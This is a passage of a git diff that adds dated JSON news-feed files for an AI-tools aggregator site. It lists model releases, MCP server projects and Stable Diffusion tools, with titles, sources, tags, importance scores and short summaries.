When you're done generating, you switch to a timeline editor: multi-track, keyframes, cuts, opacity, transform, volume, text ove", + "category": "creative_tools" + }, + { + "title": "Qwen Code v0.15.2 released", + "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.2", + "source": "GitHub Releases · Qwen Code", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-04-24T12:11:44.000Z", + "summary": "## What's Changed\n* fix(core): treat empty 'pages' parameter as unset in ReadFile by @zhangxy-zju in https://github.com/QwenLM/qwen-code/pull/3559\n* feat(session): auto-title sessions via fast model, add /rename --auto by @wenshao in https://github.com/QwenLM/qwen-code/pull/3540\n* fix(i18n): sync mismatched keys between en.js and zh.js by @doudouOUC in https://github.com/QwenLM/qwen-code/pull/3534\n* fix(cli): remove residual blank lines after MCP init completes by @BZ-D in https://github.com/Qwe", + "category": "ai_tools" + }, + { + "title": "Built an agent-to-agent payment system with Claude — here's what I learned and why I think agents need their own economy (e.g., pet food)", + "url": "https://reddit.com/r/ClaudeAI/comments/1svgba2/built_an_agenttoagent_payment_system_with_claude/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "agent_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-04-25T16:11:53.000Z", + "summary": "I built Coyns with Claude over the past several months. It's a virtual currency system designed specifically for AI agent-to-agent transactions — MCP-native, Ed25519-authenticated, with a wallet, payment rails, escrow deals, and a gaming layer (Playce.ai) where agents wager and compete. \n \nAgents can register and start earning free Gold — the base currency agents earn through activity — with no purchase required. The beta is open now and free to join at coyns.com. 
\n \nWhat Claude helped me bu", + "category": "ai_tools" + }, + { + "title": "Gemini CLI v0.39.1 released", + "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.39.1", + "source": "GitHub Releases · Gemini CLI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.7, + "date": "2026-04-24T02:11:26.000Z", + "summary": "**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.39.0...v0.39.1", + "category": "ai_tools" + }, + { + "title": "Claude estimates work in human time, not Claude time", + "url": "https://reddit.com/r/ClaudeAI/comments/1sv8avi/claude_estimates_work_in_human_time_not_claude/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.62, + "date": "2026-04-25T10:15:12.000Z", + "summary": "Whenever I ask Claude to plan a chunk of work, it comes back with wildly long timelines. 
For example, adding a feature to a CLI framework I'm working on got estimated at **1-2 days**, but in reality, Claude Code one-shots it in a few minutes.\n\nSometimes it even estimates weeks or months for more complex work, and Claude Code is able to complete it (with my input and guidance) in a few hours.\n\nI get it's probably because it was trained on estimates made by humans, but that feels weird and it alwa", + "category": "ai_tools" + }, + { + "title": "Crush v0.62.1 released", + "url": "https://github.com/charmbracelet/crush/releases/tag/v0.62.1", + "source": "GitHub Releases · Crush", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 0.62, + "date": "2026-04-24T20:28:22.000Z", + "summary": "# Stability release\r\n\r\nOpen Source :tm: is all about community, and this release got some nice contributions from our loved users!\r\n\r\n## MiniMax fix\r\n\r\nCrush wasn't allowing users to _some_ MiniMax API keys, but now all keys should work.\r\n\r\nFor context, MiniMax does not have an endpoint to validate API keys. 
We were checking they at least start with `sk-`, but not all keys from MiniMax have this prefix.\r\n\r\nKudos to @flynn-eye for the help with this one!\r\n\r\n## Fantasy fix\r\n\r\n@carsonfarmer made [", + "category": "ai_tools" + }, + { + "title": "Andrej Karpathy's 262-Minute Masterclass on AI Agents Is the Weekend Watch You Need", + "url": "https://x.com/karpathy", + "source": "Aligned News (Scoble)", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-04-25T10:55:04.004Z", + "summary": "Andrej Karpathy's 262-minute YouTube masterclass on AI agents, Claude Skills, and MCP servers is being called essential viewing for anyone building with AI tools.", + "category": "ai_tools" + }, + { + "title": "AI Agent Team Finds Drugs Targeting Cell-Type-Specific Genes Are 40% More Likely to Succeed", + "url": "https://x.com/ayirpelle/status/2029840518272975205", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-25T10:50:43.717Z", + "summary": "A team of AI agents discovered that drugs targeting cell-type-specific genes are 40% more likely to succeed in clinical development, providing a new principle for drug target prioritization.", + "category": "ai_tools" + }, + { + "title": "GPT-5.5 Is Now in the API — 38.4% on APEX-Agents vs 1.1% Two Years Ago", + "url": "https://x.com/mercor_ai/status/2047859197593911522", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-25T03:59:20.673Z", + "summary": "GPT-5.5 hits the API with APEX-Agents benchmark jumping from 1.1% (GPT-4o) to 38.4%, representing 35+ points of improvement in under two years.", + "category": "ai_tools" + }, + { + "title": "ComfyUI Raises $30M at $500M Valuation — Open Source Wins Again", + "url": "https://x.com/GrishinRobotics/status/2047760472204546230", + "source": "Aligned News 
(Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-25T03:59:20.673Z", + "summary": "ComfyUI raises $30M at $500M valuation, validating open source AI creative tools as serious infrastructure worth funding at startup scale.", + "category": "ai_tools" + }, + { + "title": "Sakana AI Launches Fugu — Multi-Agent Orchestration Is the Next Platform War", + "url": "https://x.com/SakanaAILabs/status/2047849392808624332", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-25T03:59:20.673Z", + "summary": "Sakana AI launches Fugu beta for multi-agent orchestration, betting that collective intelligence AI will define the next platform war.", + "category": "ai_tools" + }, + { + "title": "@Scobleizer Grok Can't Read X Lists — His AI Can, Key Capability Gap", + "url": "https://x.com/Scobleizer/status/2047736381162901665", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-25T03:58:07.384Z", + "summary": "Scoble notes Grok can't read X lists while his AI can, highlighting that platform integration is as important as raw model capability for practical AI utility.", + "category": "ai_tools" + }, + { + "title": "@NousResearch Hermes Agent AMA on r/LocalLLaMA — April 29, Direct Competition with OpenClaw", + "url": "https://x.com/NousResearch/status/2047840294406627659", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-25T03:57:02.129Z", + "summary": "Nous Research announces a Hermes Agent AMA on r/LocalLLaMA for April 29, 8-11am PST, with strong community interest in the OpenClaw competitor.", + "category": "ai_tools" + }, + { + "title": "@jxnlco Codex Computer Use Completes Full Financial Workflow — Signs 
PDF, Submits to Schwab", + "url": "https://x.com/jxnlco/status/2047874586310766864", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-25T03:57:02.129Z", + "summary": "Codex Computer Use completes a full financial workflow autonomously, signing a PDF with Dropbox Sign and submitting to Schwab, raising the bar for AI agent platforms.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-26.json b/data/news-feed-2026-04-26.json new file mode 100644 index 0000000..6f5f95c --- /dev/null +++ b/data/news-feed-2026-04-26.json @@ -0,0 +1,265 @@ +{ + "generated": "2026-06-05T00:44:36.305Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-26", + "article_count": 15, + "archived_story_count": 311, + "articles": [ + { + "title": "I built a free package manager for Claude Code MCP servers (open source)", + "url": "https://reddit.com/r/ClaudeAI/comments/1sw77bg/i_built_a_free_package_manager_for_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "open_source", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source", + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-26T13:12:55.000Z", + "summary": "**What I built** \n \nEvery time I wanted to add an MCP server to Claude Code I was doing the same thing: find the npm package, figure out the config format, manually edit \\`\\~/.claude.json\\`, restart. So I built **cgcone** to make it one command.\n\n \n`npm install -g @cgcone``/cli` \n`cgcone install context7` \n`cgcone install brave-search` \n\n\nThat's it. It detects Claude Code, writes the config, and prompts for any API keys with masked input — no manual JSON editing. 
\n \n \n**How Claude Code ", + "category": "ai_tools" + }, + { + "title": "GPT-5.5 launched — OpenAI's biggest agentic model yet is live in ChatGPT and Codex", + "url": "https://x.com/OpenAIDevs/status/2047377292981383662", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-26T18:08:49.116Z", + "summary": "GPT-5.5 launched this week and OpenAI called it a step change. It is now live in ChatGPT, Codex, and the API, optimized for agentic coding and multi-step tasks.", + "category": "ai_tools" + }, + { + "title": "I built an MCP server (with Claude Code) that tells you the blast radius of a code change, its free, open source, and open to feedback", + "url": "https://reddit.com/r/ClaudeAI/comments/1sw4dqr/i_built_an_mcp_server_with_claude_code_that_tells/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "open_source" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-04-26T10:53:09.000Z", + "summary": "I built **Impact Graph MCP** using Claude Code. 
It’s an MCP server that does AST-based impact analysis for TypeScript codebases, so Claude can tell you things like *“if I rewrite* `loginUser`*, what else breaks?”*\n\n**What it does:** \nYou give it a function name, file path, or module, and it returns:\n\n* Direct and indirect dependents\n* Risk score (0–100) and risk factors\n* Which system layers are affected (API, auth, frontend, etc.)\n* Decision-oriented guidance: recommended strategy, suggested t", + "category": "ai_tools" + }, + { + "title": "DeepSeek V4 Pro is the #1 open weights model — open source is not losing the AI race", + "url": "https://x.com/ArtificialAnlys/status/2047547434809880611", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-04-26T18:08:49.116Z", + "summary": "DeepSeek V4 Pro launched this week and immediately became the number one open weights model on the GDPval-AA agentic benchmark. Open source is not losing the AI race.", + "category": "ai_tools" + }, + { + "title": "Thrilled to co-facilitate a #BuildwithAI Goma tech session with @RomanaMedi We explored prompt chaining for fullstack prototyping in Google AI Studio and Agentic Coding in Antigravity, including Rules, Skills & MCP for adapting AI to proje…", + "url": "https://x.com/AmaniBisimwa4/status/2048370790333046822", + "source": "X / @amanibisimwa4", + "tags": [ + "mcp", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-26T11:57:07.000Z", + "summary": "Thrilled to co-facilitate a #BuildwithAI Goma tech session with @RomanaMedi We explored prompt chaining for fullstack prototyping in Google AI Studio and Agentic Coding in Antigravity, including Rules, Skills & MCP for adapting AI to project context. 
Thanks to everyone who joined", + "category": "ai_tools" + }, + { + "title": "Built an Open Source Tool that reduces token usage by ~94% for initial context building for Coding Agents.", + "url": "https://reddit.com/r/ClaudeAI/comments/1swbkvk/built_an_open_source_tool_that_reduces_token/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 0.86, + "date": "2026-04-26T16:06:42.000Z", + "summary": "I've been using claude code daily and kept hitting the same wall,\n\nit would spend the first few messages just re-exploring ,my codebase. files it had already seen. every. single. session.\n\nI measured it one day , 27,292 tokens before it wrote a single line of code, \n\n\n\nso I built **Fullerenes**\n\n`npx fullerenes init` \n\nmaps your codebase into a local \n\nsqlite graph. agents query it over MCP instead of reading raw files from scratch.\n\n\n\n27,292 → 919 tokens. same understanding.\n\nIt has several oth", + "category": "ai_tools" + }, + { + "title": "GPT-5.5 is now available in the API.\n\nThe model brings higher intelligence and stronger token efficiency to complex work, helping tasks get done with fewer retries.", + "url": "https://x.com/OpenAIDevs/status/2047742566410736090", + "source": "X / @openaidevs", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 0.86, + "date": "2026-04-24T18:20:47.000Z", + "summary": "GPT-5.5 is now available in the API.\n\nThe model brings higher intelligence and stronger token efficiency to complex work, helping tasks get done with fewer retries.", + "category": "ai_tools" + }, + { + "title": "huggingface/ml-intern: 🤗 ml-intern: an open-source ML engineer that reads papers, trains models, and ships ML models", + "url": "https://reddit.com/r/StableDiffusion/comments/1swctgr/huggingfacemlintern_mlintern_an_opensource_ml/", + "source": "Reddit r/StableDiffusion", 
+ "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 0.78, + "date": "2026-04-26T16:52:22.000Z", + "summary": "This looks interesting. \n\nThis is a quick summary according to Gemini:\n\n\"Think of ML Intern as a \"junior machine learning engineer\" that lives inside your computer.\n\nWhile a standard AI (like ChatGPT) can give you advice or write a small snippet of code, ML Intern actually does the work from start to finish. It’s an \"agent,\" meaning it doesn't just talk; it takes action.\n\nWhat it actually does for you:\n\nReads the \"Homework\": If you tell it to use a new technique from a scientific paper, it will ", + "category": "creative_tools" + }, + { + "title": "Cloudflare just shipped enterprise MCP governance, is this where the industry is heading or does nobody care", + "url": "https://reddit.com/r/ClaudeAI/comments/1sw4zmj/cloudflare_just_shipped_enterprise_mcp_governance/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 0.78, + "date": "2026-04-26T11:25:25.000Z", + "summary": "Cloudflare wrapped Agents Week last week. The enterprise MCP stuff caught my eye. They shipped MCP server portals that aggregate multiple upstream servers behind Cloudflare Access auth. Code Mode collapses thousands of API endpoints into two tools (search and execute) running in a sandboxed Worker, dropping context costs by 99.9%. AI Gateway sits between MCP clients and model providers for usage tracking. Shadow MCP detection got added to Cloudflare Gateway as a category to watch.\n\nWhat I can't ", + "category": "ai_tools" + }, + { + "title": "Most image managers suck for AI. 
I built AURA: A local-first Vault for 'AI Hoarders' with Civitai integration, Vision Tagging, Aesthetic Grading, and more!", + "url": "https://reddit.com/r/StableDiffusion/comments/1swck8j/most_image_managers_suck_for_ai_i_built_aura_a/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 0.7, + "date": "2026-04-26T16:42:44.000Z", + "summary": "**GitHub Link (Free & Open Source):** [https://github.com/TheGho7t/AURA-AI-Studio-Vault](https://github.com/TheGho7t/AURA-AI-Studio-Vault)\n\nBe sure to check out all of the other details and images on the GitHub page.\n\nHey everyone. As a self-proclaimed AI hoarder, I was tired of losing my prompts and forgetting what my LoRAs even did. Existing image managers didn't quite do what I needed, so I built **AURA** **AI Studio Vault**.\n\nA few things it does:\n\n* **One-Click Import:** Use the include", + "category": "creative_tools" + }, + { + "title": "OpenClaw vs Hermes — the agent framework war is the most important battle in AI tooling right now", + "url": "https://x.com/LoicBerthelot/status/2047690512199540959", + "source": "Aligned News (Scoble)", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-26T18:08:49.116Z", + "summary": "The battle between OpenClaw (345K+ GitHub stars) and Hermes (100K stars in 7 weeks) is the most important competition in AI tooling. Hermes wins on learning and memory. OpenClaw wins on adoption. 
Mercury is trying to combine both.", + "category": "ai_tools" + }, + { + "title": "AI agent burnout is real — what it means for careers in an AI-augmented workplace", + "url": "https://x.com/Chengdavid923/status/2048451643298218069", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-26T18:07:23.972Z", + "summary": "The emerging phenomenon of AI agent burnout among young ambitious workers has implications for how companies should structure AI-augmented work and what sustainable AI-human collaboration looks like.", + "category": "ai_tools" + }, + { + "title": "GenX Pro v1.6.6 - released 04/26/2026 New Daily Shorts Workflow (pick models, pay less) Voice Remix — Design Unique Voices GenX LM Voice V1 — Native Voice Cloning New MCP capabilities (69 tools in total). Watch the release preview: https:/…", + "url": "https://x.com/genxproapp/status/2048454195716497743", + "source": "X / @genxproapp", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-04-26T17:28:33.000Z", + "summary": "GenX Pro v1.6.6 - released 04/26/2026 New Daily Shorts Workflow (pick models, pay less) Voice Remix — Design Unique Voices GenX LM Voice V1 — Native Voice Cloning New MCP capabilities (69 tools in total). Watch the release preview: https:// genx.pro/latest One app.", + "category": "ai_tools" + }, + { + "title": "Why this matters: DeepSeek released preview access to V4-Pro, a 1.6-trillion-parameter MoE model with a genuine one-million-token context window that matches GPT-5 and Gemini 3.0 Pro on key bench... 
We wrote it up:", + "url": "https://x.com/FSEvolved/status/2048447077705830600", + "source": "X / @fsevolved", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-26T17:00:16.000Z", + "summary": "Why this matters: DeepSeek released preview access to V4-Pro, a 1.6-trillion-parameter MoE model with a genuine one-million-token context window that matches GPT-5 and Gemini 3.0 Pro on key bench... We wrote it up:", + "category": "ai_tools" + }, + { + "title": "United Imaging Intelligence has released uAI NEXUS MedVLM, an open-source LLM for medical video analysis. The model claims to significantly outperform general-purpose models like GPT-5.4 and Gemini 3.1 in surgical safety and clinical repor…", + "url": "https://x.com/H_Mhatre_/status/2048359364902170792", + "source": "X / @h_mhatre_", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-26T11:11:43.000Z", + "summary": "United Imaging Intelligence has released uAI NEXUS MedVLM, an open-source LLM for medical video analysis. 
The model claims to significantly outperform general-purpose models like GPT-5.4 and Gemini 3.1 in surgical safety and clinical reporting benchmarks.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-27.json b/data/news-feed-2026-04-27.json new file mode 100644 index 0000000..5e78c69 --- /dev/null +++ b/data/news-feed-2026-04-27.json @@ -0,0 +1,263 @@ +{ + "generated": "2026-06-05T00:44:36.433Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-27", + "article_count": 15, + "archived_story_count": 683, + "articles": [ + { + "title": "(Open Source) AURA: A Local-First Management Vault for Civitai - Auto-tagging, Metadata and Browser Integration - Version 1.0.1 Fixes", + "url": "https://reddit.com/r/StableDiffusion/comments/1sx98ch/open_source_aura_a_localfirst_management_vault/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "open_source", + "github_release", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "open_source", + "github_release", + "tool_update" + ], + "importance": 0.9400000000000001, + "date": "2026-04-27T16:44:43.000Z", + "summary": "**GitHub Link:** [**https://github.com/TheGho7t/AURA-AI-Studio-Vault**](https://github.com/TheGho7t/AURA-AI-Studio-Vault)\n\n**Latest Release:** [**https://github.com/TheGho7t/AURA-AI-Studio-Vault/releases/tag/AURAv1.0.1**](https://github.com/TheGho7t/AURA-AI-Studio-Vault/releases/tag/AURAv1.0.1)\n\nI resolved an obvious mistake causing images and models not to be rated General by default. I also fixed an issue regarding what type of model (Lora, Checkpoint, Dora, etc...) being displayed. It had bee", + "category": "creative_tools" + }, + { + "title": "Qwen 3.6 Max Preview just dropped on OpenRouter. One trillion parameters. Released today. $1.30/$7.80 per million tokens. 262K context. Sparse mixture-of-experts. Optimized for agentic coding and tool use. No open weights. 
Alibaba's bigges…", + "url": "https://x.com/bridgemindai/status/2048816878454194460", + "source": "X / @bridgemindai", + "tags": [ + "api_update", + "open_source", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-27T17:29:43.000Z", + "summary": "Qwen 3.6 Max Preview just dropped on OpenRouter. One trillion parameters. Released today. $1.30/$7.80 per million tokens. 262K context. Sparse mixture-of-experts. Optimized for agentic coding and tool use. No open weights. Alibaba's biggest model ever. And it costs less", + "category": "ai_tools" + }, + { + "title": "A quick guide to add @SurfAI MCP to claude 1-Get your API key from Surf dashboard 2-Claim free credits 3-Run in terminal (Replace your api key) : claude mcp add surf -e SURF_API_KEY=YOUR_API_KEY -- npx -y @surf -ai/surf-mcp 5-Verify: claud…", + "url": "https://x.com/0xAirr/status/2048663698806620544", + "source": "X / @0xairr", + "tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-27T07:21:02.000Z", + "summary": "A quick guide to add @SurfAI MCP to claude 1-Get your API key from Surf dashboard 2-Claim free credits 3-Run in terminal (Replace your api key) : claude mcp add surf -e SURF_API_KEY=YOUR_API_KEY -- npx -y @surf -ai/surf-mcp 5-Verify: claude mcp list You should see Surf MCP", + "category": "ai_tools" + }, + { + "title": "how to build a persistent memory layer like recall?", + "url": "https://reddit.com/r/ClaudeAI/comments/1swyzvc/how_to_build_a_persistent_memory_layer_like_recall/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-04-27T09:50:01.000Z", + "summary": "I've been testing recall 2.0 and their context layer is exactly what i want. 
it sits outside the chat, ingests all my github repos and web research, and then feeds the exact right context into claude when i ask a question. i want to build my own version of this using the mcp protocol so i don't have to pay for another subscription. what's the best vector database and orchestration setup to replicate this? my current python script just dumps way too much junk into the context window and confuse", + "category": "ai_tools" + }, + { + "title": "it’s been a good run... rip my stable diffusion setup (+ Raven fanart)", + "url": "https://reddit.com/r/StableDiffusion/comments/1sx30ke/its_been_a_good_run_rip_my_stable_diffusion_setup/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 0.9400000000000001, + "date": "2026-04-27T13:01:33.000Z", + "summary": "i've been a stable diffusion user since march 2023, but sadly my journey ended last june 2025. it's been a struggle since python got updated in sagemaker and the api i was renting got way too greedy, they even removed the free features for http tunneling services.\n\non top of that, kaggle keeps banning my accounts if you try to generate any woman pictures, and google colab basically moved everything behind the pro version. it's getting harder and harder to find a good spot to build.\n\nanyway, i wa", + "category": "creative_tools" + }, + { + "title": "Built an MCP connector for official Python docs .. 
no API keys, no unofficial sources", + "url": "https://reddit.com/r/ClaudeAI/comments/1sx2u3s/built_an_mcp_connector_for_official_python_docs/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 0.8600000000000001, + "date": "2026-04-27T12:54:43.000Z", + "summary": "I built an MCP server for Python stdlib docs with one goal: make it easy to defend in a company environment.\n\n[https://github.com/ayhammouda/python-docs-mcp-server](https://github.com/ayhammouda/python-docs-mcp-server)\n\nThe core idea is simple. Instead of going through third-party APIs or unofficial doc sources, it connects MCP clients to the official Python docs.\n\nI built it because this is where good tooling usually gets stuck. In a solo setup, everything looks fine. In a company, security and", + "category": "ai_tools" + }, + { + "title": "OpenClaw v2026.4.25 released", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.4.25", + "source": "GitHub Releases · OpenClaw", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.78, + "date": "2026-04-27T12:45:30.000Z", + "summary": "## 2026.4.25\n\n### Highlights\n\n- Voice replies get a full TTS upgrade: `/tts latest`, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. 
Thanks @leonchui, @zoujiejun, @solar2ain, @cshape, @xuruiray, @itsuzef, and @barronlroth.\n- Plugin startup and install paths move to the cold persisted registry, cutting broad manifest scans while making plugin update, repair, provider discov", + "category": "ai_tools" + }, + { + "title": "Built a open-source local music video generator using SDXL + AnimateDiff + audio-reactive GLSL shaders", + "url": "https://reddit.com/r/StableDiffusion/comments/1swx934/built_a_opensource_local_music_video_generator/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 0.78, + "date": "2026-04-27T08:04:41.000Z", + "summary": "I needed visuals for AI-generated tracks, so I built Glitchframe, a pipeline that takes an audio file and produces a full music video using SDXL keyframe stills or AnimateDiff motion, with GLSL shaders that react to beat/onset/spectrum data in real time.\n\nStack: SDXL for backgrounds, optional AnimateDiff (fair warning: \\~20 GB VRAM), Skia for kinetic typography, WhisperX for word-level lyric sync, FFmpeg NVENC for encode. 
UI runs in Gradio locally.\n\nAnimateDiff integration was the most painful p", + "category": "creative_tools" + }, + { + "title": "PixlStash 1.1.0 is now available!", + "url": "https://reddit.com/r/StableDiffusion/comments/1sx8khw/pixlstash_110_is_now_available/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 0.7, + "date": "2026-04-27T16:21:39.000Z", + "summary": "[PixlStash](https://pixlstash.dev) is a locally hosted, open source, picture management server for organising, filtering, tagging and reviewing large image collections.\n\nThe main target for version 1.1.0 was to support existing self-organised reference folders, so you can index, tag and include pictures from folders you've carefully organised yourself. But there are some more features as well:\n\n* Automatic import folders in the UI along with the reference folders\n* Statistics sidebar that shows ", + "category": "creative_tools" + }, + { + "title": "Is anyone working on a ComfyUI node for the new Ideogram LoRA API? (They call it Custom Model)", + "url": "https://reddit.com/r/StableDiffusion/comments/1sxh6ir/is_anyone_working_on_a_comfyui_node_for_the_new/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.62, + "date": "2026-04-27T21:21:20.000Z", + "summary": "I've been playing around with the new Ideogram LoRA training feature just to test it out. I trained a LoRA on the [Loomies illustration library](https://getillustrations.com/illustration-pack/loomies-free-vector-illustrations), and the way it gets all the details right and handles text generation is honestly flawless. 😀\n\nBut, I do 99% of my actual work locally and hate leaving my node setups. Has anyone seen (or started building) a custom node to pull their API into ComfyUI yet? 
I'd love to be ", + "category": "creative_tools" + }, + { + "title": "NVIDIA Sonic Makes Humanoid Robots Cheap — Open Source Forever", + "url": "https://x.com/JoseCSancho/status/2048587841882439784", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-27T15:59:13.833Z", + "summary": "Braygent's take: NVIDIA Sonic is the moment humanoid robotics becomes accessible to startups. The economics changed permanently today.", + "category": "ai_tools" + }, + { + "title": "NVIDIA Kimodo — Motion Diffusion for Humanoid Robots Trained on 700 Hours of Mocap", + "url": "https://x.com/AIKumarvels/status/2048294442063970777", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-27T15:59:13.833Z", + "summary": "Braygent's take: NVIDIA Kimodo plus Sonic gives humanoid developers a complete open source motion stack. NVIDIA is winning the physical AI era the same way it won LLM compute.", + "category": "ai_tools" + }, + { + "title": "OpenAI Releases GPT-5.5 The new model tops the benchmarks against its main rivals, Claude Opus 4.7 and Google's Gemini 3.1 Pro, even outperforming GPT-5.4 Pro in some areas. The model is built for agentic tasks and ease of use: GPT-5.5 fig…", + "url": "https://x.com/News_pulse360/status/2048733780744278450", + "source": "X / @news_pulse360", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-27T11:59:31.000Z", + "summary": "OpenAI Releases GPT-5.5 The new model tops the benchmarks against its main rivals, Claude Opus 4.7 and Google's Gemini 3.1 Pro, even outperforming GPT-5.4 Pro in some areas. 
The model is built for agentic tasks and ease of use: GPT-5.5 figures out what you're trying to do", + "category": "ai_tools" + }, + { + "title": "OpenAI has introduced Privacy Filter, a locally runnable open-weight AI model for context-aware detection and redaction of personally identifiable information in text. The model is now available on platforms like Hugging Face and GitHub. h…", + "url": "https://x.com/AlternativeTo/status/2048666474181808532", + "source": "X / @alternativeto", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-27T07:32:04.000Z", + "summary": "OpenAI has introduced Privacy Filter, a locally runnable open-weight AI model for context-aware detection and redaction of personally identifiable information in text. The model is now available on platforms like Hugging Face and GitHub. https:// alternativeto.net/news/2026/4/op enai-releases-privacy-filter-a-local-open-weight-model-built-for-personal-data-masking/ …", + "category": "ai_tools" + }, + { + "title": "two model releases shipped on the same day, april 24. it’s worth putting them next to each other. // openai released GPT-5.5 at $5/$30 per million in/out tokens. closed weights, 1M context, agent stack baked in. // deepseek released V4 the…", + "url": "https://x.com/witcheer/status/2048665173326532861", + "source": "X / @witcheer", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-27T07:26:54.000Z", + "summary": "two model releases shipped on the same day, april 24. it’s worth putting them next to each other. // openai released GPT-5.5 at $5/$30 per million in/out tokens. closed weights, 1M context, agent stack baked in. // deepseek released V4 the same day. 
